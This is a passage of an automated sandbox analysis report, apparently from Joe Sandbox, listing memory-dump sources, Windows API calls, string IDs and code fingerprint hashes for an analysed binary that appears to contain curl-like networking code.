                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: malloc$_cexitmemcpystrlen
                                                                                                                                                                                                                                                            • String ID: !c(
                                                                                                                                                                                                                                                            • API String ID: 701060287-1773518143
                                                                                                                                                                                                                                                            • Opcode ID: cf073ce8e164ef78986c4390de768dd8c7d62ed0f6e404dae246fce0795cc88e
                                                                                                                                                                                                                                                            • Instruction ID: 36ef03fe96e8fe8d20d8fb559c0bba7e094323f51ad209d35aa0adbc700d17c0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf073ce8e164ef78986c4390de768dd8c7d62ed0f6e404dae246fce0795cc88e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E3188B1A00755CFCB14EF69D88429AB7F5FB58300F14842EDD44E7311E338A8AAEB85
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: malloc$_cexitmemcpystrlen
                                                                                                                                                                                                                                                            • String ID: !c(
                                                                                                                                                                                                                                                            • API String ID: 701060287-1773518143
                                                                                                                                                                                                                                                            • Opcode ID: dc1b4e7a8c5d1373c30c25839053819d8141e8d3dfb50b9e0e126002610b2dcc
                                                                                                                                                                                                                                                            • Instruction ID: 1991a148af1d098f7e875b718ce10764dd3ab2ed8b4204e1f4941afa302d250e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc1b4e7a8c5d1373c30c25839053819d8141e8d3dfb50b9e0e126002610b2dcc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 993198B1A00751CFCB20EF69D884289B7F4FB58304F14842EDD48A7311E338A99AEF95
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: malloc$_cexitmemcpystrlen
                                                                                                                                                                                                                                                            • String ID: !c(
                                                                                                                                                                                                                                                            • API String ID: 701060287-1773518143
                                                                                                                                                                                                                                                            • Opcode ID: c330175ab15b95ce875a493f69b54c92390438372651b6c34a1f11a9f71702f1
                                                                                                                                                                                                                                                            • Instruction ID: 2cf92412ad376905365991ad3251c63b7f9c4c1788e06f7b146147a3c4c63c87
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c330175ab15b95ce875a493f69b54c92390438372651b6c34a1f11a9f71702f1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A3156B5A00741CFCB14EF69D884689B7F4FB58304F10852EDD48A7311E738A99AEF95
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • strtol.MSVCRT ref: 0023237B
                                                                                                                                                                                                                                                            • strlen.MSVCRT ref: 0023238D
                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F4), ref: 002323C9
                                                                                                                                                                                                                                                            • GetConsoleScreenBufferInfo.KERNELBASE(00000000), ref: 002323D8
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: BufferConsoleHandleInfoScreenstrlenstrtol
                                                                                                                                                                                                                                                            • String ID: COLUMNS
                                                                                                                                                                                                                                                            • API String ID: 4155930958-2475376301
                                                                                                                                                                                                                                                            • Opcode ID: ff8822cd34231ee6a5a94e8eb80c8546d2fe9ba08b28d53d98ac167163847d5b
                                                                                                                                                                                                                                                            • Instruction ID: 75e52ee09f706231eba070e2f05b10d60c5bfc45067b93df48aa1d44aef71a78
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff8822cd34231ee6a5a94e8eb80c8546d2fe9ba08b28d53d98ac167163847d5b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D312CF0614201DBEB049F18D4D976B7BA4EF54318F1441A9EC088F386E77AD9A8CBD5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetProcAddress.KERNELBASE(00000000,InitSecurityInterfaceA), ref: 0024C0EC
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                                                            • String ID: InitSecurityInterfaceA$secur32.dll$security.dll
                                                                                                                                                                                                                                                            • API String ID: 190572456-3788156360
                                                                                                                                                                                                                                                            • Opcode ID: bd6c223cb453199878f7c2a4c1683e2e23d64f7d54f812883e39b10982528b73
                                                                                                                                                                                                                                                            • Instruction ID: d75497cf27ddc8af2e54742e04033719f1407ae27d01ed96040a56da2ed890cf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bd6c223cb453199878f7c2a4c1683e2e23d64f7d54f812883e39b10982528b73
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8F0A7B4B11201D6FB64AB7D6C17B2611884B60744F266137ED06E52D2F776CC248B59
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • getaddrinfo.WS2_32(?,?,?), ref: 0027CD23
                                                                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,00000000,00000010,?,?,?,?), ref: 0027CDFF
                                                                                                                                                                                                                                                            • freeaddrinfo.WS2_32(?,?,?,?), ref: 0027CE62
                                                                                                                                                                                                                                                            • WSASetLastError.WS2_32(00002AF9,?,?,?), ref: 0027CEA8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLastfreeaddrinfogetaddrinfomemcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4195171763-0
                                                                                                                                                                                                                                                            • Opcode ID: 7c10ea5cc3e406346c10ec75248bc691ecc935fead23682f33a43d5f8e624652
                                                                                                                                                                                                                                                            • Instruction ID: 4b381f4f140d3f857f2fe5f5a01182b9402c4cc760dd59a6b6346d5e16db4da4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c10ea5cc3e406346c10ec75248bc691ecc935fead23682f33a43d5f8e624652
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A416EB06142069BDB209F79D989B177BF4BF80714F188539EC0D97251EB74E864CBE2
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                            • String ID: %s$Connection #%ld to host %s left intact
                                                                                                                                                                                                                                                            • API String ID: 1294909896-118628944
                                                                                                                                                                                                                                                            • Opcode ID: bb3c0f917d8eafbd17ee987f8981b792c02e38bd2fcf289a717571acc4b19a09
                                                                                                                                                                                                                                                            • Instruction ID: 004dd0e154bd2af94e60eca8b3d95105ab79bfed55debb5e9885740a5fa04f06
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb3c0f917d8eafbd17ee987f8981b792c02e38bd2fcf289a717571acc4b19a09
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C561C3B0520305DBEB399F24DC4DBDA77E5EF82308F040429E84E46252EB75A9A8CB53
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConsoleMode
                                                                                                                                                                                                                                                            • String ID: %s
                                                                                                                                                                                                                                                            • API String ID: 4145635619-620797490
                                                                                                                                                                                                                                                            • Opcode ID: 0aafd599030d13ad770df74109bb9463d811fed6b2cd4ad326e8d8f9363a81fb
                                                                                                                                                                                                                                                            • Instruction ID: b0810c83fe26bcd071cff81900f09512269bc00455949a0779b280a91da012e1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0aafd599030d13ad770df74109bb9463d811fed6b2cd4ad326e8d8f9363a81fb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98E0D87272024087CB11AF95BC929597B16EFA5349F040032FD0855226F7528575DB51
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • calloc.MSVCRT(00000001,00000680), ref: 002694BC
                                                                                                                                                                                                                                                              • Part of subcall function 0025D170: GetTickCount.KERNEL32 ref: 0025D251
                                                                                                                                                                                                                                                              • Part of subcall function 0025D170: QueryPerformanceFrequency.KERNEL32(005813C8,?,?,?,?,?,?,?,?,?,?,?,002460CB), ref: 0025D1B7
                                                                                                                                                                                                                                                              • Part of subcall function 0025D170: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,002460CB), ref: 0025D1D0
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: PerformanceQuery$CountCounterFrequencyTickcalloc
                                                                                                                                                                                                                                                            • String ID: %s://%s
                                                                                                                                                                                                                                                            • API String ID: 3586984470-2356238553
                                                                                                                                                                                                                                                            • Opcode ID: e92e98620e87a141538635f503e11e89f3bd99dece26e08de6e5ab78efded011
                                                                                                                                                                                                                                                            • Instruction ID: 67f384d3b8dc5e38c7e8f7b4668178aa435a0181164ff148c6dbdf18fbb3d004
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e92e98620e87a141538635f503e11e89f3bd99dece26e08de6e5ab78efded011
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2E17DB05107418FEB209F28DC897D67BF4BF44308F084539ED9E8A292EBB5A5A4CF55
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,00000080), ref: 00245C88
                                                                                                                                                                                                                                                            • socket.WS2_32(?,?,00000011), ref: 00245CF1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memcpysocket
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3436932642-0
                                                                                                                                                                                                                                                            • Opcode ID: 8454851d862f5cb96a9dbdbf71bc6a1790ebb5fbc344aaaf4d2a50684a1882dc
                                                                                                                                                                                                                                                            • Instruction ID: adae4d36ca126decbe0bd2407e3891cb1d71779c50d4444f2842ac3195ebefdf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8454851d862f5cb96a9dbdbf71bc6a1790ebb5fbc344aaaf4d2a50684a1882dc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71319F71A10601DFD7188F14DC84B96B7A1FF88724F14857DE89A8B392D731E864CB51
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CleanupStartup
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 915672949-0
                                                                                                                                                                                                                                                            • Opcode ID: 8971ca6fc2b7f7d9884c0e9f368ca910a58c2c7cc2d6069d67b3fcd5d6acf9ce
                                                                                                                                                                                                                                                            • Instruction ID: a744c1ae1bdee18832050472c11f833ed5650758feccae1578d0e0fe2f5a1bcc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8971ca6fc2b7f7d9884c0e9f368ca910a58c2c7cc2d6069d67b3fcd5d6acf9ce
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6911507066023287E31CEF9BAE8A7A577A49B10344F044135DC81D91A2F7B8CD2C8B69
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • getenv.MSVCRT ref: 00241D0F
                                                                                                                                                                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104), ref: 00241D2A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: EnvironmentExpandStringsgetenv
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4247756900-0
                                                                                                                                                                                                                                                            • Opcode ID: 712733c4bc2beeab5f9a7bc1e79a0f3a16ad7bed0e7aa9433297989f1528ce12
                                                                                                                                                                                                                                                            • Instruction ID: b8eb8b8a5bae976f55849bf3fcefcb1db4d6f6b4eaa2aa1b518c1bd79f7b5b7f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 712733c4bc2beeab5f9a7bc1e79a0f3a16ad7bed0e7aa9433297989f1528ce12
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05E0DFF1D0419067E7296729BC4ABEB3E945B82724F080478E9C59A1D0E6A888E4C3A3
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00243D9E,?,00243D9E,00000000), ref: 0024B4EE
                                                                                                                                                                                                                                                            • WSASetLastError.WS2_32(00002726,?,00243D9E,00000000), ref: 0024B4FB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
